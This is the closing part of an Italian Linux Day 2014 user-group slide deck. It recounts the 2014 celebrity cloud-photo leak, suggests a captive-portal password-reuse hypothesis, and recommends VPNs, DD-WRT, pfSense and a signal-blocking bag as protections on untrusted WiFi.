  • 30. The Fappening Un incredibile storia di accesso abusivo ai profili Cloud di centinaia di star di Hollywood, e conseguente pubblicazione online di Foto e Video intimi scattate con i loro smartphone! ● Selena Gomez ● Jennifer Lawrence ● Melanie Laurent ● Lizzy Caplan ● Rihanna (in foto) ● Emily Browning ● Jenny McCarthy ● Avril Lavigne ● Jessica Alba ● Kaley Cuoco ● Lady Gaga ● Hillary Duff ● ... Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 31. Ipotesi: Fappening & Captive Portal Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014 Attraverso un Captive Portal, necessario per accedere ad una rete WiFi in uno o più eventi cinematografici, hanno indotto i VIP a registrarsi. L'errato utilizzo della medesima password per più servizi ha permesso agli attaccanti di accedere ai servizi Cloud delle vittime e di sottrare le Foto e Video intimi.
  • 32. Contromisure La prima regola è DIFFIDATE, sfruttate la vostra offerta Internet! Ma a volte è indispensabile collegarsi ad un Access Point sconosciuto, possiamo proteggerci? Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 33. VPN Una Virtual Private Network permette di collegare in modo sicuro due estremi di una connessione tramite una rete non dedicata, tipicamente utilizzando internet. Si può vedere una VPN come l'estensione su scala geografica di una rete locale privata che collega tra loro terminali dislocati su tutto il territorio sfruttando una rete IP pubblica e realizzando una rete LAN, detta appunto virtuale e privata, logicamente del tutto equivalente ad una infrastruttura fisica di rete appositamente dedicata. Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 34. Server VPN? È possibile crearsi un proprio Server VPN: Sfruttando DD-WRT, firmware Open Source per il vostro Router, se è compatibile. Implementando pfSense, firewall/router software open source basato su FreeBSD, configurabile su un comune computer. Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 35. Contromisura Estrema Black Hole Data Bag isola il proprio dispositivo da qualsiasi segnale 2G, 3G o 4G oltre ai segnali WiFi, Bluetooth e NFC! La vostra privacy è assicurata! Fonte: D3Lab Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 36. Domande... ? Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014

Editor's Notes

  • #2: Presidente LUG: Stefano Ballardini
  • #4: Informatica Forense: disciplina per valutare i dati informatici in un processo giuridico. Open Sors
  • #6: Ci sono 287 distribuzioni principali nel mondo!